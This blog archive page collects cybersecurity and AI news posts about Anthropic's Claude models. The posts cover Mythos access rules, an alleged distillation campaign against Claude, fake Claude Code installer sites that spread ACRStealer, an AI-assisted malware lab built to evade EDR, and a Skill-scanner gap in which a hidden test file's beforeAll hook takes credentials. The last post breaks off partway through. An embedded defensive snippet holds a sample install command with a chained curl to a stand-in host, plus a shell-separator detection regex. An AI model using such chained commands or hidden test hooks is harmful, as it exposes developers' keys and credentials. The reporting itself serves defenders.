Showing posts with label Claude. Show all posts

Anthropic Restores Limited Access to Claude Mythos 5 AI Model After US Government Approval

 

Earlier limits on Anthropic’s top-tier AI tools have been eased by U.S. officials, reopening limited availability of the Claude Mythos 5 system to certain approved American institutions. Though only recently barred due to fears about potential misuse threatening national safety, the model is now accessible again under tight conditions. Government oversight in high-level AI deployment continues expanding, especially when such systems involve strong digital defense functions. 

While concerns remain, selective reinstatement suggests a shift toward managed access rather than blanket bans. Now cleared by U.S. authorities, Mythos 5 can be used again by groups managing essential infrastructure operations. Over a hundred entities - some among the largest corporations - are set to reconnect under new guidelines. Though access returns in phases, Anthropic emphasizes steady progress restoring function, even as talks continue with federal agencies on widening reach later. 

Anthropic’s stated goal remains restoring full public availability of the Fable 5 system after further review. The restriction began with an export directive dated June 12, which forced Anthropic to shut off access to Mythos 5 along with Fable 5. Not long after, OpenAI revealed a delay in the wide launch of GPT-5.6, a pause that came at the direction of U.S. officials. Rather than opening access freely, the company granted early permissions only to select collaborators whose names had already been passed to federal agencies.

Oversight like this signals a quiet but steady push from regulators to track how powerful artificial intelligence moves into real-world use. Officials worry powerful AI systems might fall into the hands of rival nations - like those in Beijing or Moscow - despite existing barriers. Because these tools can detect system flaws faster than humans, they may speed up digital attacks when protections fail. While designed for defense, their functions could shift toward offense once access is gained through weak points. 

Even infrastructure meant to resist intrusion becomes a target under such conditions. Surprisingly, Anthropic admitted that authorities questioned whether flaws in its security could allow bypassing controls meant to stop abuse of the Fable 5 system when spotting code weaknesses. Although officials noted improvements in handling those dangers, details about the specific defenses enabling partial revival of Mythos 5 remain undisclosed by public agencies. 

Though some defend the selection method, lawyers and tech executives have raised doubts. Questions emerge over who gets picked - free expression supporters point out unclear criteria behind group approvals. Without clear rules on checks, suspicion grows. Safety tests gain backing even as control worries surface; Sam Altman backs strong evaluations yet hesitates at state influence shaping access paths. Decisions made behind closed doors unsettle those watching closely. 

Trusted groups working with Mythos 5 will not need export permits, and the same applies to their staff outside the U.S., as long as they are named on the official roster. Firms left off the list must still follow current licensing rules. A number of listed entities reportedly belong to Anthropic’s Project Glasswing, a collaboration of around one hundred technology companies and research centers. 

The news follows an executive directive from Donald Trump that created a voluntary process: developers of cutting-edge artificial intelligence may offer their systems to federal authorities for scrutiny during a thirty-day window before wider release. Some say this step offers temporary protection until more complete regulatory structures emerge through policy work. 

Yet concerns rise elsewhere - extended delays in launching powerful AI tools might hinder progress, weakening American firms just as international competitors push forward with their own intelligent technologies.

Anthropic Alleges Alibaba Conducted Massive AI Capability Extraction Campaign Against Claude

 


Anthropic has accused Chinese technology conglomerate Alibaba and its AI research division, Qwen, of carrying out a large-scale effort to extract capabilities from its Claude family of artificial intelligence models, describing the incident as the most extensive distillation operation the company has encountered.

The allegations were detailed in a June 10 letter sent to U.S. Senate Banking Committee Chair Tim Scott and Ranking Member Elizabeth Warren. In the correspondence, Anthropic claimed that operators linked to Alibaba and Qwen systematically interacted with Claude in an attempt to capture and reproduce some of the model's most advanced capabilities.

According to the company, the activity occurred between April 22 and June 5, 2026. During that period, Anthropic says it recorded more than 28.8 million exchanges associated with the operation. The requests were allegedly distributed across nearly 25,000 fraudulent accounts, enabling the actors to conduct high-volume interactions with the platform while obscuring the true source of the activity.
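To put the reported scale in perspective, the figures above can be turned into rough averages. The short Python sketch below only does arithmetic on the numbers quoted in the letter; because the source says "more than" 28.8 million and "nearly" 25,000, the results are approximations, and the variable names are illustrative.

```python
from datetime import date

# Figures as reported in the letter; treat them as approximate.
exchanges = 28_800_000
accounts = 25_000
start, end = date(2026, 4, 22), date(2026, 6, 5)

# Count both the first and the last day of the reported window.
days = (end - start).days + 1

per_account = exchanges / accounts   # average exchanges per account
per_day = exchanges / days           # average exchanges per day

print(days, round(per_account), round(per_day))
```

On these figures the window spans 45 days, which works out to roughly 1,150 exchanges per account and about 640,000 exchanges per day.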

Anthropic stated that the campaign was not focused on general-purpose chatbot functions. Instead, it allegedly targeted capabilities considered among the most valuable within the Claude ecosystem, including software engineering tasks and advanced agentic reasoning. These functions form a critical component of the company's Mythos Preview model, one of Anthropic's most sophisticated AI systems designed to perform complex reasoning and autonomous task execution.

At the center of the allegations is a technique known as adversarial distillation. In machine learning, distillation generally refers to the process of training a model using outputs generated by another system. While the approach itself is commonly used within the AI industry, Anthropic argues that the method becomes problematic when it relies on unauthorized access to proprietary models.

According to the company, the actors behind the campaign repeatedly queried Claude and collected its responses at scale. Those outputs could then be used as training material for another AI system, allowing developers to reproduce aspects of Claude's behavior without investing the time, computational resources, and research expenditure typically required to build a frontier model from the ground up.

Anthropic warned lawmakers that such activity enables organizations to appropriate years of research and development through large-scale extraction campaigns. The company argued that these operations are designed to gather capabilities developed by leading U.S. AI laboratories and incorporate them into competing systems without bearing the costs associated with original model development.

Beyond intellectual property concerns, Anthropic also raised questions about safety. The company noted that models trained through adversarial distillation may replicate useful capabilities while failing to inherit the safeguards, alignment mechanisms, and risk controls embedded within the original system. As a result, the practice could create AI models that retain advanced functionality but operate with fewer protections against misuse.

The allegations against Alibaba follow earlier claims made by Anthropic regarding unauthorized access attempts linked to Chinese AI developers. In February 2026, the company disclosed that DeepSeek, the startup whose low-cost AI models attracted global attention in 2025, was among several organizations accused of attempting to improperly obtain Claude outputs. Anthropic now characterizes these incidents as part of a broader pattern of repeated efforts to extract capabilities from leading U.S. AI systems.

The dispute emerges amid growing government scrutiny of advanced AI technologies. Earlier this month, Anthropic revealed that it had received guidance from the Trump administration requiring the company to restrict access to its newest AI models, including Fable 5 and Mythos 5. Under the directive, access would be limited to U.S. persons, preventing non-U.S. citizens, including some employees, from interacting with the latest systems.

The issue is also beginning to influence policy discussions on Capitol Hill. Senators Bill Hagerty and Andy Kim are reportedly preparing legislation that would authorize sanctions or other penalties against Chinese organizations found to have improperly obtained outputs from U.S. AI models for the purpose of training competing systems. The proposal reflects growing concern among lawmakers that frontier AI capabilities have become both strategic economic assets and matters of national security.

Alibaba has not publicly responded to the allegations.

The dispute surfaces a new battleground in the global AI race. As companies invest billions of dollars to develop increasingly capable models, concerns are shifting beyond traditional cybersecurity threats toward the protection of model knowledge itself. For AI developers, the challenge is no longer limited to securing infrastructure and data. It increasingly involves preventing the large-scale extraction of capabilities that can be repurposed to accelerate the development of rival systems.

With governments, technology companies, and regulators paying closer attention to model security, the Anthropic-Alibaba dispute may become an early test case for how the industry addresses unauthorized AI capability harvesting and the growing geopolitical competition surrounding advanced artificial intelligence.

Hackers Exploit Fake Claude Code Installers and Install Malware


Developers searching for Claude Code installation instructions could be lured into an advanced malware campaign that disguises itself as genuine AI tooling documentation. 

Fake Claude code exploit

Researchers found fake Claude Code and developer platform websites built to steal credentials, cryptocurrency, and API keys.

According to Straiker researchers, “the attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt.” “You copy a command. You paste it in your terminal. By then, it’s already too late,” the researchers said in their analysis of the campaign. 

Highlights of the fake Claude code campaign 

1. Researchers found over 88 fake domains mimicking Claude Code and other developer sites. The campaign uses SEO poisoning and Google ads to place malicious install pages above genuine documentation.

2. Threat actors hide malicious commands inside genuine installation commands without disrupting the installation itself.

3. The malware specifically targets AI-related assets such as cloud development credentials, API keys, and authentication tokens.

About the credential theft campaign 

The campaign targeted users of popular AI and developer tools, such as Claude Code, JetBrains, Perplexity Comet, and Cline. 

According to the researchers, the operation depends on over 88 domains hosted across genuine platforms and constantly rotates its infrastructure, letting malicious sites resurface quickly after takedowns. To trap targets, threat actors use redirect chains, SEO poisoning, and paid Google ads that place fake installation pages above genuine documentation in search results.

These websites closely impersonate genuine vendor resources and display installation commands that look legitimate but include hidden separators, such as “&,” that launch malicious actions alongside the expected software installation.

In several cases, the genuine command still runs successfully, which helps conceal the compromise.
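One way to act on this is to inspect a pasted install line for command separators before running it. The Python sketch below is a minimal illustration, not a tool from the Straiker analysis: the operator list, the function name `find_chaining`, and the sample commands (`example-cli`, `example.invalid`) are all assumptions made for this example.

```python
import re

# Operators that let one pasted line run more than one command.
# This list is an illustrative assumption, not an exhaustive one.
CHAIN_PATTERN = re.compile(r"(\|\||&&|[;&|`]|\$\()")


def find_chaining(command: str) -> list[str]:
    """Return every shell chaining operator found in a pasted command."""
    return CHAIN_PATTERN.findall(command)


# Hypothetical commands for demonstration only.
clean = "npm install -g example-cli"
suspicious = "npm install -g example-cli & curl http://example.invalid/x"

clean_hits = find_chaining(clean)
suspicious_hits = find_chaining(suspicious)

print(clean_hits)
print(suspicious_hits)
```

The check is deliberately naive. It does not parse shell quoting, so an ampersand inside a quoted URL would also be flagged, and legitimate installers that pipe a download into a shell will trigger it too. It is best read as a prompt to look at the full command, not as a verdict.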

Delivery of malware and launch tactics

Researchers found various delivery techniques, such as rundll32.exe loading malicious DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts. 

These techniques improve the attackers' chances of evading conventional detection tools. Unlike typical infostealers, the campaign targets AI assets such as authentication tokens, API keys, and cloud development credentials from tools such as Continue[.]dev and Cline. 

After execution, the malware uses a multi-stage attack chain that features encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.

Researchers identified the primary payload as ACRStealer, an information-stealing malware family that has evolved to include sophisticated encryption and evasion tactics. They also identified a cryptocurrency clipboard hijacker that redirects transactions by replacing copied wallet addresses.

AI-Assisted Malware Lab Found Testing Ways to Evade Security Tools, Sophos Reports

 



Researchers at cybersecurity firm Sophos have uncovered a malware development framework that uses artificial intelligence tools to speed up the creation and testing of ransomware-related software designed to avoid detection by security products.

The investigation began after Sophos analysts discovered suspicious files on a customer system. What initially appeared to be a collection of penetration-testing tools soon revealed signs of criminal activity, including references to ransom notes and organizations listed on ransomware leak sites.

According to Sophos, the framework combines traditional attack tools with AI-assisted development workflows. Researchers found evidence that the operators used coding assistants such as Cursor and Claude Opus during different stages of development, including writing code, reviewing results, refining payloads, and researching techniques that could help malware evade security controls.

One of the framework's primary goals was to bypass Endpoint Detection and Response (EDR) platforms. These security products are designed to identify malicious activity on computers and servers, often detecting attacks that traditional antivirus software might miss.

The toolkit contained several components intended to reduce the chances of detection. Among them were customized Cobalt Strike profiles that made malicious network traffic resemble ordinary web browsing activity, communication channels that routed commands through Telegram, and malware development scripts capable of injecting malicious code into legitimate Windows applications while allowing those programs to continue functioning normally.

Researchers also identified the use of a Cloudflare Worker that acted as an intermediary between infected systems and attacker-controlled infrastructure. This setup can make it more difficult for defenders to identify the true location of command-and-control servers.

A particularly notable feature of the framework was an automated Active Directory discovery system. Active Directory is widely used in enterprise networks to manage users, computers, permissions, and other resources. Because it contains valuable information about an organization's internal structure, attackers frequently attempt to map Active Directory environments after gaining access to a network.

Sophos found that the discovery process relied on a series of AI-assisted agents that gathered information, assessed results, selected follow-up actions, and continued the investigation of the network. Rather than requiring a human operator to manually perform every step, parts of the reconnaissance process could be carried out through predefined automated workflows.

The framework itself appeared to operate through multiple specialized AI agents assigned to different tasks. Sophos reported that one agent coordinated the overall development process while others focused on testing, documentation, operational security improvements, virtual machine deployment, proxy testing, and malware evaluation.

Researchers also discovered that some agents had been tasked with examining publicly available security research. The system collected information from technical reports and research publications, extracted details about detection-evasion methods, mapped those techniques to the MITRE ATT&CK framework, recreated testing environments, and documented the results.

At the center of the operation was a Python-based payload generation tool. This component produced malware written primarily in Rust and Go while combining encryption, execution techniques, and anti-analysis measures intended to make detection more difficult. Sophos observed nearly 80 generated modules being tested against more than 70 separate evasion methods.

The malware was evaluated in laboratory environments against security products from Sophos, CrowdStrike, and Microsoft. Researchers noted that repeated testing and revision cycles appeared to improve the success rate of many payloads. However, they also observed inconsistencies between some reported results and actual testing outcomes, leaving questions about the accuracy of certain internal performance claims.

Despite the extensive use of artificial intelligence during development, Sophos found no indication that AI was embedded within deployed malware or operating independently on victim systems. The technology was primarily used to accelerate the research, testing, and refinement process while human operators remained responsible for directing the activity.

The findings provide another example of how threat actors are incorporating AI into existing workflows. Rather than introducing entirely new attack methods, these tools appear to be helping attackers shorten the time needed to transform publicly available security research into functioning malware capable of challenging modern security defenses.

Anthropic's Mythos Preview Detects Over 10,000 Software Bugs in Project Glasswing


Anthropic recently disclosed that its Project Glasswing initiative found over 10,000 critical- or high-severity vulnerabilities in system software in its first month of operation.

Claude Mythos Preview finds bugs

Anthropic and about 50 partners deployed Claude Mythos Preview to find flaws in critical software infrastructure. The company said the initiative's progress is now limited by the pace at which flaws can be verified, patched, and disclosed rather than by the rate of discovery. 

The discovery of flaws

Cloudflare detected 2,000 vulnerabilities throughout its critical-path systems, with around 400 labelled as critical or high severity. The company said that its bug-finding rate rose more than tenfold. Several other partners reported similar increases in flaw detection rates.

About bug patches

The UK’s AI Security Institute reported that Mythos Preview has been the only model to patch both of its cyber issues end-to-end. Mozilla detected and patched 271 bugs in Firefox while testing Mythos Preview, about ten times the number found in Firefox 148 with Claude Opus 4.6. 

More about Anthropic patching flaws

Anthropic analyzed over 1,000 open-source projects with Mythos Preview and found an estimated 6,202 high- or critical-severity bugs out of 23,019 findings. Of the 1,752 critical or high bugs reviewed by independent security research institutes, 90.6% were acknowledged as valid and 62.4% were confirmed as critical or high severity.

One bug was found in wolfSSL, a cryptographic library used by billions of devices. If exploited, the bug would have allowed a threat actor to forge certificates and host fake sites impersonating email providers or banks. The bug was assigned CVE-2026-5194 and has been fixed.
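The percentages in this paragraph can be converted back into approximate counts. The Python sketch below uses only the figures quoted above; since the published rates are rounded, the derived counts are estimates, and the variable names are illustrative.

```python
# Figures as reported for the open-source scan.
total_findings = 23_019
high_or_critical_est = 6_202
reviewed = 1_752
valid_rate = 0.906       # share acknowledged as valid
confirmed_rate = 0.624   # share confirmed as critical or high severity

share_high = high_or_critical_est / total_findings
valid_count = round(reviewed * valid_rate)
confirmed_count = round(reviewed * confirmed_rate)

print(f"{share_high:.1%}", valid_count, confirmed_count)
```

On these numbers, about 27% of all findings were estimated to be high or critical, and the independent review corresponds to roughly 1,587 valid reports, of which roughly 1,093 were confirmed at critical or high severity.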

Critical vulnerabilities

Anthropic has reported 530 critical or high bugs to researchers. Seventy-five have been fixed and sixty-five have received public advisories. Anthropic said that a high or critical flaw detected by Mythos Preview takes roughly two weeks to fix on average.

In its recent release, Palo Alto Networks added more than five times as many patches as normal. Microsoft stated that it will keep releasing further fixes. Oracle is identifying and resolving vulnerabilities in all of its products many times more quickly than in the past.

Three weeks ago, Anthropic made Claude Security available to clients of Claude Enterprise in a public beta. Claude Opus 4.7 has been used to patch more than 2,100 vulnerabilities.

To help maintainers handle bug reports, the company partnered with the Alpha-Omega project of the Open Source Security Foundation. Anthropic has not made Mythos-class models available to the general public, citing the need for more robust security measures to prevent abuse.

OpenCode’s Rapid Growth Reflects Rising Developer Concerns Over AI Vendor Dependence

 





A glaring divide is emerging in the AI coding industry as developers increasingly weigh the convenience of fully managed coding platforms against the flexibility of open-source alternatives designed to avoid dependence on a single provider.

The debate intensified this week after Anthropic used its first “Code with Claude” developer conference to showcase major upgrades across its Claude Code ecosystem. The company announced that rate limits for Claude Code users on Pro, Max, Team, and Enterprise plans would be significantly expanded, while peak-hour usage restrictions were removed entirely. Anthropic also raised usage limits for its Opus API and disclosed a major infrastructure agreement with SpaceX involving the Colossus 1 data center.

According to the company, the agreement will provide access to more than 300 megawatts of computing power and approximately 220,000 Nvidia GPUs expected to come online within weeks. The move reflects the broader AI industry race to secure high-performance computing infrastructure as demand for generative AI services continues to increase.

Anthropic also introduced several updates aimed at turning Claude Code into a more advanced managed development environment. These included expanded Managed Agents capabilities, support for coordinating multiple AI agents simultaneously, a public beta feature called Outcomes, and an experimental memory system internally referred to as “dreaming,” which is intended to help AI systems retain and improve contextual understanding over time.

During the event, Anthropic executive Boris Cherny demonstrated remote agents and automated routines capable of running coding tasks asynchronously, effectively allowing Claude Code to function more like a workflow orchestration platform rather than a traditional coding assistant.

At the same time, a separate trend has been accelerating across the open-source community. OpenCode, an independent coding harness project associated with SST, has experienced a dramatic rise in popularity after positioning itself as an alternative to vendor-controlled AI development environments.

The project’s GitHub repository has now surpassed 157,000 stars, overtaking the roughly 122,000 stars associated with Anthropic’s own Claude Code repository at the time of reporting. While GitHub stars do not necessarily represent active users or production deployments, they are often viewed as indicators of developer awareness, interest, and community support.

The roots of OpenCode’s rapid growth trace back to January 2026, when Anthropic introduced server-side authentication checks that prevented third-party tools from accessing Claude Pro and Max subscriptions through OAuth-based authentication methods.

Several projects, including OpenCode, Cline, and RooCode, were affected by the policy change. Prior to the restrictions, these tools allowed developers to run autonomous coding workflows through fixed-price Claude subscriptions rather than paying significantly higher API-based usage fees tied to token consumption.

From Anthropic’s perspective, the restriction addressed a business and infrastructure problem. Subscription plans were designed to support usage within the company’s own ecosystem, while third-party tools were effectively redirecting high-volume workloads through pricing structures never intended for external automation platforms.

Discussions across developer forums, including lengthy conversations on Hacker News, showed that many users understood Anthropic’s reasoning. However, criticism quickly emerged over the manner in which the restrictions were enforced. Developers reported that the changes were introduced without advance notice, disrupting workflows in active sessions. Some users also claimed that automated abuse-detection systems temporarily restricted accounts during the transition period.

OpenCode responded rapidly after the restrictions took effect. The project added support for ChatGPT Plus integrations within hours and began expanding compatibility across multiple AI providers. Anthropic later formalized its position in updated Terms of Service published in February, clarifying that subscription OAuth tokens were not intended for third-party routing or automation tools.

The dispute escalated further in March after OpenCode reportedly received legal requests related to Claude subscription authentication. Shortly afterward, the project merged an update removing references to Claude Pro and Max authentication from its codebase. By April 4, Anthropic’s enforcement measures had expanded to additional third-party harnesses, including OpenClaw and NanoClaw, pushing developers toward pay-as-you-go API billing structures.

Interest in OpenCode accelerated during this period. On March 21, a Hacker News discussion surrounding the project gained more than 1,200 points and hundreds of comments, driving additional visibility across the developer community. By early April, the repository had already crossed 120,000 GitHub stars.

As of May 8, project activity data showed approximately 156,904 stars, 18,259 forks, 4,788 issues, and more than 1,600 open pull requests. OpenCode’s website also claimed participation from over 850 contributors and estimated usage among roughly 6.5 million monthly developers.

Industry observers note that the OAuth dispute alone likely does not explain OpenCode’s growth. Instead, the incident appears to have accelerated an existing movement toward model-agnostic development tools. OpenCode gradually shifted its messaging away from low-cost Claude access and toward provider neutrality, emphasizing that developers should be able to switch between AI models as pricing, performance, and capabilities evolve.

That distinction is increasingly important as competition intensifies between major AI providers. A developer using a model-agnostic harness can move between Anthropic, OpenAI, or other models with relatively minor configuration changes. In contrast, developers operating entirely within a vertically integrated ecosystem may face higher switching costs if pricing structures, usage limits, or platform policies change unexpectedly.
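The idea of a model-agnostic harness can be illustrated with a small Python sketch. This is not OpenCode's actual design: the `Harness` class, the `Provider` type, and the two stub providers are hypothetical stand-ins, and a real tool would call each vendor's SDK where the stubs return a string.

```python
from dataclasses import dataclass
from typing import Callable

# In this sketch a "provider" is just a function from prompt to completion text.
Provider = Callable[[str], str]


@dataclass
class Harness:
    providers: dict[str, Provider]
    active: str

    def complete(self, prompt: str) -> str:
        # All calling code goes through this one method, so it never
        # depends on which vendor is currently selected.
        return self.providers[self.active](prompt)


# Stub providers standing in for real SDK calls (hypothetical).
def provider_a(prompt: str) -> str:
    return f"[provider-a] {prompt}"


def provider_b(prompt: str) -> str:
    return f"[provider-b] {prompt}"


harness = Harness({"a": provider_a, "b": provider_b}, active="a")
first = harness.complete("refactor utils.py")

harness.active = "b"  # the "minor configuration change"
second = harness.complete("refactor utils.py")

print(first)
print(second)
```

Because the workflow only talks to `Harness.complete`, switching vendors is a one-line change. The trade-off is that features unique to one provider have to be wrapped or given up.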

The debate mirrors earlier divisions within the software infrastructure industry. Some analysts have compared the current situation to Docker and Podman, where one platform focused heavily on integrated services and managed workflows while the other prioritized portability, operational control, and independence from platform lock-in.

OpenCode’s rise has also drawn criticism from parts of the developer community. Users in public discussions have raised concerns about high memory usage, the growing complexity of the project’s TypeScript codebase, inconsistent release stability, and the broader security implications of integrating multiple AI providers into a single framework.

Security considerations remain particularly relevant because every additional provider connection potentially expands the software’s attack surface. OpenCode also faced backlash after removing Claude subscription authentication support following reported legal pressure, with some developers expressing frustration over how the project handled the situation.

Still, the overall industry direction appears increasingly clear. Anthropic is investing heavily in a future built around tightly managed AI coding ecosystems that combine infrastructure, orchestration, memory systems, and coding assistance within a single platform.

At the same time, open-source projects such as OpenCode, Cline, Aider, and OpenClaw continue to attract developers seeking portability and reduced dependency on individual AI vendors.

For many software teams, the central issue is no longer choosing between Claude Code and OpenCode alone. Instead, developers are beginning to decide whether critical AI-assisted workflows should remain under the control of a single provider or operate through more flexible systems capable of adapting as the AI landscape continues to shift.

Researchers Find Security Gap in Anthropic Skill Scanners




Security researchers have uncovered a gap in the way Anthropic Skill scanning tools inspect third-party AI packages, allowing malicious code hidden inside test files to execute on developer systems even after scanners marked the Skills as safe.

The issue centers on Anthropic Skills, reusable packages designed for AI coding assistants such as Claude Code, Cursor, and Windsurf. These packages often include instructions, scripts, and configuration files that help AI agents perform development tasks inside IDE environments.

Researchers from Gecko Security found that existing Skill scanners focus primarily on files tied directly to agent behavior, particularly SKILL.md, while ignoring bundled test files that can still run locally through standard developer tooling.

In the demonstrated attack chain, a Skill passed all scanner checks because its visible instruction files contained no prompt injection attempts, suspicious shell commands, or malicious instructions. However, the repository also included a hidden .test.ts file stored elsewhere in the directory structure. Although the file was outside the agent execution layer, it still executed through the project’s testing framework with full access to local resources.

According to researcher Jeevan Jutla, the problem begins when developers install a Skill using the npx skills add command. The installer copies nearly the entire repository into the project’s .agents/skills/ directory. Only a few items, including .git, metadata.json, and files prefixed with underscores, are excluded during installation.

Once placed inside the repository, testing frameworks such as Jest and Vitest automatically discover matching test files through recursive glob patterns. Both frameworks reportedly enable the dot:true option, allowing them to search inside hidden directories including .agents/. Mocha follows similar recursive discovery behavior in many default configurations.

A malicious Skill can therefore include a file such as reviewer.test.ts containing a beforeAll function that silently executes before visible tests begin. Researchers said these payloads can access environment variables, .env files, SSH keys, AWS credentials, deployment tokens, and other sensitive information commonly available inside local developer environments and CI pipelines. The data can then be transmitted to external servers without triggering obvious warnings during test execution.
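A team could audit for this pattern by listing test-like files under `.agents/` and noting which ones register lifecycle hooks. The Python sketch below is a minimal illustration and not Gecko Security's tooling: the file-name pattern, the hook list, the `audit_skills` function, and the demo directory layout are assumptions, and a real check should follow the test runner's own configuration.

```python
import re
import tempfile
from pathlib import Path

# File-name patterns that common JS/TS test runners pick up by default.
# Treat this as an assumption; check your runner's own configuration.
TEST_NAME = re.compile(r"\.(test|spec)\.[cm]?[jt]sx?$")
# Hooks that run code outside the visible test bodies.
HOOK = re.compile(r"\b(beforeAll|beforeEach|afterAll|afterEach)\s*\(")


def audit_skills(project_root: Path) -> list[tuple[Path, bool]]:
    """List test-like files under .agents/ and whether they use lifecycle hooks."""
    skills_dir = project_root / ".agents"
    findings: list[tuple[Path, bool]] = []
    if not skills_dir.is_dir():
        return findings
    # Path.rglob does not skip dot-prefixed names, so hidden folders are included.
    for path in sorted(skills_dir.rglob("*")):
        if path.is_file() and TEST_NAME.search(path.name):
            text = path.read_text(encoding="utf-8", errors="replace")
            findings.append((path.relative_to(project_root), bool(HOOK.search(text))))
    return findings


# Demo on a throwaway directory with a hypothetical Skill layout.
with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp)
    skill = root / ".agents" / "skills" / "demo-skill"
    (skill / "lib").mkdir(parents=True)
    (skill / "SKILL.md").write_text("# Demo skill\n", encoding="utf-8")
    (skill / "lib" / "reviewer.test.ts").write_text(
        "beforeAll(() => {});\n", encoding="utf-8"
    )
    results = audit_skills(root)

for rel_path, has_hook in results:
    print(rel_path.as_posix(), has_hook)
```

A hit does not prove malice, since legitimate Skills may ship tests. It marks files that the test runner will execute and that a Skill scanner focused on SKILL.md may never have inspected.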

The researchers stressed that the AI agent itself is never involved in the compromise. Instead, the malicious behavior occurs through trusted developer tooling already integrated into the software workflow. Existing scanners inspect the files the AI agent can interpret, but not the files executed separately by testing infrastructure.

The technique resembles older software supply-chain attacks involving malicious npm postinstall scripts and poisoned pytest plugins. However, Gecko Security noted that the Anthropic Skill ecosystem creates an additional propagation problem because installed Skills are often committed into shared repositories so teams can reuse them collaboratively.

GitHub’s default .gitignore templates do not automatically exclude .agents/ directories. Once a malicious test file enters the repository, every teammate cloning the project and every CI pipeline running automated tests may execute the payload across branches, forks, and deployment workflows.

The findings arrived shortly after multiple large-scale security audits examining the broader Anthropic Skills ecosystem. A January academic study named SkillScan analyzed 31,132 Skills collected from two major marketplaces and found that 26.1% contained at least one vulnerability spanning 14 separate patterns. Data exfiltration appeared in 13.3% of examined Skills, while privilege escalation appeared in 11.8%. Researchers also determined that Skills bundling executable scripts were 2.12 times more likely to contain vulnerabilities than instruction-only packages.

Several weeks later, Snyk published its ToxicSkills audit covering 3,984 Skills from ClawHub and skills.sh. The company reported that 13.4% of scanned Skills contained at least one critical-level security issue. Automated analysis combined with human review identified 76 confirmed malicious payloads, while eight malicious Skills reportedly remained publicly accessible on ClawHub when the findings were released.

In April, Cisco introduced an AI Agent Security Scanner integrated into IDE platforms including VS Code, Cursor, and Windsurf. The scanner can detect prompt injection attempts, suspicious shell execution patterns, and data exfiltration behaviors within Skill definitions and agent-referenced scripts. However, Gecko Security said bundled test files remain outside the scanner’s documented detection surface because the tool was designed around agent interaction layers rather than developer execution layers.

Researchers noted that other products, including Snyk Agent Scan and VirusTotal Code Insight, face similar structural limitations. These tools inspect what the agent is instructed to execute but may overlook code paths triggered separately through local development frameworks.

Elia Zaitsev described the broader issue as a distinction between interpreting intent and monitoring actual execution behavior. In this case, the malicious code did not depend on prompt manipulation or AI instructions. It operated as ordinary TypeScript executed through legitimate test runners with full local permissions.

Zaitsev also warned that enterprise AI agents increasingly operate with privileged access to OAuth tokens, API keys, and centralized data sources. If those credentials are accessible through environment variables during automated testing, malicious test payloads can reach sensitive infrastructure without requiring direct agent compromise.

Mike Riemer added that threat actors frequently reverse engineer security patches within 72 hours of release, while many organizations take far longer to deploy fixes. In the case of the Anthropic Skill test-file issue, researchers warned that the exposure window becomes more difficult to manage because the malicious files may execute immediately after installation without triggering scanner alerts.

Security researchers are urging development teams to block test discovery inside .agents/ directories and inspect Skill repositories for files such as *.test.*, *.spec.*, conftest.py, __tests__/, and suspicious configuration scripts before merging code.
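The inspection step can be partly automated. The sketch below is a minimal illustration rather than the researchers' own tooling: it flags paths that match the file patterns listed above. The function names and the `scan_directory` helper are assumptions made for this example.

```python
from fnmatch import fnmatchcase
from pathlib import Path, PurePosixPath

# Patterns taken from the list in the article; everything else is illustrative.
SUSPICIOUS_FILE_PATTERNS = ("*.test.*", "*.spec.*", "conftest.py")
SUSPICIOUS_DIR_NAMES = ("__tests__",)


def is_suspicious(relative_path: str) -> bool:
    """Return True if a path looks like something a test runner would pick up."""
    path = PurePosixPath(relative_path)
    # Any file living under a __tests__/ directory is flagged.
    if any(part in SUSPICIOUS_DIR_NAMES for part in path.parts[:-1]):
        return True
    # Otherwise compare the file name against the known test-file patterns.
    return any(fnmatchcase(path.name, pattern) for pattern in SUSPICIOUS_FILE_PATTERNS)


def scan_directory(root: str) -> list:
    """Walk a directory (hidden folders included) and list suspicious files."""
    base = Path(root)
    hits = []
    for entry in base.rglob("*"):
        if entry.is_file():
            relative = entry.relative_to(base).as_posix()
            if is_suspicious(relative):
                hits.append(relative)
    return sorted(hits)
```

Running `scan_directory(".agents")` from a repository root would list candidates for manual review. A match is not proof of malice, and a clean result does not rule out other execution paths such as build scripts.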

The report also recommends pinning Skill installations to verified commit hashes rather than installing the latest repository version. Researchers said this reduces the risk of attackers submitting clean repositories for scanner approval before later inserting malicious files. The approach aligns with guidance published in the OWASP Agentic Skills Top 10 project.
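A team could enforce pinning with a small check in CI. The following is a sketch under stated assumptions: it presumes the team keeps its own record of each Skill's source and Git ref (the `skill_refs` mapping is hypothetical and not part of any Skill installer), and it only verifies that each ref is a full commit hash rather than a branch or tag name.

```python
import re

# A full Git object ID is 40 hex characters (SHA-1) or 64 (SHA-256 repositories).
FULL_COMMIT_HASH = re.compile(r"(?:[0-9a-f]{40}|[0-9a-f]{64})")


def is_pinned_commit(ref: str) -> bool:
    """Return True only for a full commit hash, not a branch, tag, or short hash."""
    return FULL_COMMIT_HASH.fullmatch(ref.strip().lower()) is not None


def unpinned_skills(skill_refs: dict) -> list:
    """Given a hypothetical {skill_name: ref} mapping, list the entries that float."""
    return sorted(name for name, ref in skill_refs.items() if not is_pinned_commit(ref))
```

Branch names, tags, and abbreviated hashes are rejected on purpose: the first two can be moved to point at different code later, and short hashes can become ambiguous.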

Organizations that already store Skills inside repositories are advised to audit existing .agents/ directories immediately, rotate exposed credentials if suspicious files are discovered, inspect CI logs for unexplained outbound network traffic, and review repository history to identify when potentially malicious files entered development pipelines.

The researchers additionally called on security vendors to provide greater transparency regarding which directories, execution surfaces, and file categories their scanners actually inspect. They argued that security teams evaluating Anthropic Skill scanners should verify whether products analyze bundled test files, build scripts, and CI configurations rather than focusing exclusively on prompt injection and agent instruction analysis.

22 Year Old Developer Reverse Engineered Code in Claude Mythos, Tech Industry Shocked

 


Earlier this year, AI giant Anthropic launched a powerful new model called Claude Mythos. It caused a stir in Silicon Valley and across the tech industry. The general-purpose model could find software bugs that no human knew existed.

About Claude Mythos


But Anthropic did not release Mythos to the world. It offered the model only to cybersecurity experts at large organizations that build or operate critical software infrastructure, and asked them to find and patch flaws before Anthropic released it commercially for public use.

But within just two weeks, a 22-year-old developer named Kye Gomez made predictions about the core designs that made Claude Mythos advanced and later published OpenMythos, an open project that anticipates Anthropic’s breakthrough. Gomez’s code made waves in the AI and tech research community.

If real, this incident could have serious implications. Why? Because if a self-taught developer can reverse engineer the infrastructure innovation of a billion-dollar AI firm in just a few days, what could threat actors with malicious intent do? If this happens, the debate over proprietary AI architecture will fade away.

About OpenMythos


